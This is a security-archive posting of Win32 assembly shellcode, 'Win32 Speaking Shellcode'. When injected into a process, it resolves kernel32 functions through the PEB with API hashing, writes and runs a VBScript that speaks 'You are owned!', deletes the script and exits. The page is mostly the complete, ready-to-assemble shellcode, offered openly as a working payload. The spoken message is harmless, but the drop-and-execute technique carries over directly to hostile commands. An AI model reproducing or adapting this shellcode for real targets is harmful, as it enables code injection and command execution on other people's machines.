what you don't know can hurt you

Win32 Speaking Shellcode

Win32 Speaking Shellcode
Posted Feb 12, 2012
Authored by Debasish Mandal

Win32 speaking shellcode that says "You are owned!" when injected into a process.

tags | shellcode
systems | windows
MD5 | 99f385bd5fa8d2441dadf37cbc51df9e

Win32 Speaking Shellcode

Change Mirror Download
;Win32 Speaking Shell Code
;Author : Debasish Mandal
;Email : debasishm89 [at] gmail.com
;Blog : http://www.debasish.in/
;Win32 APIs Used: CreateFileA,WriteFile,CloseHandle,WinExec and ExitProcess
;Uses PEB technique to find the base address of kernel32.dll

[SECTION .data]
n db ''
[Section .text]
[BITS 32]
global _start
_start:
jmp start_main
;peb technique
find_kernel32:
xor eax, eax ; clear ebx
mov eax, [fs:0x30] ; get a pointer to the PEB
mov eax, [eax+0x0C] ; get PEB->Ldr
mov eax, [eax+0x14] ; get PEB->Ldr.InMemoryOrderModuleList.Flink (1st entry)
mov eax, [eax] ; get the next entry (2nd entry)
mov eax, [eax] ; get the next entry (3rd entry)
mov eax, [eax+0x10] ; get the 3rd entries base address (kernel32.dll)
ret
;Function : Find function base address
find_function:
pushad
mov ebp,[esp+0x24]
mov eax,[ebp+0x3c]
mov edx,[ebp+eax+0x78]
add edx,ebp
mov ecx,[edx+0x18]
mov ebx,[edx+0x20]
add ebx,ebp
find_function_loop:
jecxz find_function_finished
dec ecx
mov esi,[ebx+ecx*4]
add esi,ebp
compute_hash:
xor edi,edi
xor eax,eax
cld
compute_hash_again:
lodsb
test al,al
jz compute_hash_finished
ror edi,0xd
add edi,eax
jmp compute_hash_again
compute_hash_finished:
find_function_compare:
cmp edi,[esp+0x28]
jnz find_function_loop
mov ebx,[edx+0x24]
add ebx,ebp
mov cx,[ebx+2*ecx]
mov ebx,[edx+0x1c]
add ebx,ebp
mov eax,[ebx+4*ecx]
add eax,ebp
mov [esp+0x1c],eax
find_function_finished:
popad
ret
find_funcs_for_dll:
lodsd
push eax
push edx
call find_function
mov [edi], eax
add esp,0x08
add edi,0x04
cmp esi,ecx
jne find_funcs_for_dll
find_funcs_for_dll_finished:
ret

GetArgument1: ;temp.vbs
call ArgumentReturn1
db "temp.vbs"
db 0x00
GetArgument2: ;CreateObject("SAPI.SpVoice").Speak"You aare owned"
call ArgumentReturn2
db 'CreateObject("SAPI.SpVoice").Speak"You aare owned"'
db 0x00
GetArgument3: ;CScript.exe //B temp.vbs
call ArgumentReturn3
db "CScript.exe //B temp.vbs"
db 0x00
GetArgument4: ;COMMAND.COM /C DEL temp.vbs
call ArgumentReturn4
db "COMMAND.COM /C DEL temp.vbs"
db 0x00
GetHashes:
call GetHashesReturn
; CreateFileA
db 0xA5
db 0x17
db 0x00
db 0x7C
; WriteFile hash
db 0x1F
db 0x79
db 0x0A
db 0xE8
; CloseHandle hash
db 0xFB
db 0x97
db 0xFD
db 0x0F
;;WinExec hash
db 0x98
db 0xFE
db 0x8A
db 0x0E
;ExitProcess hash
db 0x7E
db 0xD8
db 0xE2
db 0x73
;Main
start_main:
sub esp,0x14 ;allocate space on stack to store 5 function address
mov ebp,esp
call find_kernel32
mov edx,eax ;save base address of kernel32 in edx
jmp GetHashes ;get address of WinExec hash
GetHashesReturn:
pop esi ;get pointer to hash into esi
lea edi, [ebp+0x4] ;we will store the function addresses at edi
mov ecx,esi
add ecx,0x14 ; store address of last hash into ecx
call find_funcs_for_dll ;get function pointers for all hashes
jmp startcalling
startcalling:
;All Done Start calling Win32 APIs
xor eax,eax
xor ebx,ebx ;zero out the registers
xor ecx,ecx ;ECX will always hold 0
;Createfile API
push ecx ; Set Last Parameter to zero
push 0x80 ;FILE_ATTRIBUTE_NORMAL
push 0x2 ;CREATE_ALWAYS
push ecx ;0
push ecx ;0
push 0x2 ;FILE_WRITE_DATA
jmp GetArgument1
ArgumentReturn1:
pop edx ;EDX is now holding the argument temp.vbs
push edx ;Push temp.vbs into stack
call [ebp+4] ;CreateFileA.Kernel32.dll
mov ebx,eax ; store the value of handler to ebx
;writefileapi:
xor ecx,ecx ;Because value of ecx is getting changed after execution of createfile
push ecx ;0
mov eax,n
push eax ;&n
push 0x32 ;Length of the character to write is 50 ~ 0x32
jmp GetArgument2
ArgumentReturn2:
pop edx ;EDX is now holding the argument
push edx
push ebx ; Put the returned buffer into stack.
call [ebp+0x8] ; Writefile.Kernel32.dll
; CloseHandle()
push ebx ; Push the handle buffer into stack
call [ebp+0xC] ; CloseHandle.Kernel32.dll
; Extecute the VBSCRIPT FILE
xor ecx,ecx ; Because value of ecx is getting changed after execution of createfile
push ecx ;0,Force Minimize push zero in stack
jmp GetArgument3 ;ASCII "CScript.exe //B temp.vbs"
ArgumentReturn3:
pop edx
push edx
call [ebp+16] ;WinExec.Kernel32.dll
; Delete the temporary file
xor ecx,ecx ; Because value of ecx is getting changed after execution of createfile
push ecx ;0,Force Minimize push zero in stack
jmp GetArgument4
ArgumentReturn4: ;COMMAND.COM /C DEL temp.vbs
pop edx
push edx
call [ebp+16] ;WinExec.Kernel32.dll
; Exit Process
xor ecx,ecx ; Because value of ecx is getting changed after execution of createfile
push ecx ;0
call [ebp+20] ;ExitProcess.Kernel32.dll
Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    2 Files
  • 19
    Sep 19th
    2 Files
  • 20
    Sep 20th
    14 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    28 Files
  • 23
    Sep 23rd
    13 Files
  • 24
    Sep 24th
    10 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close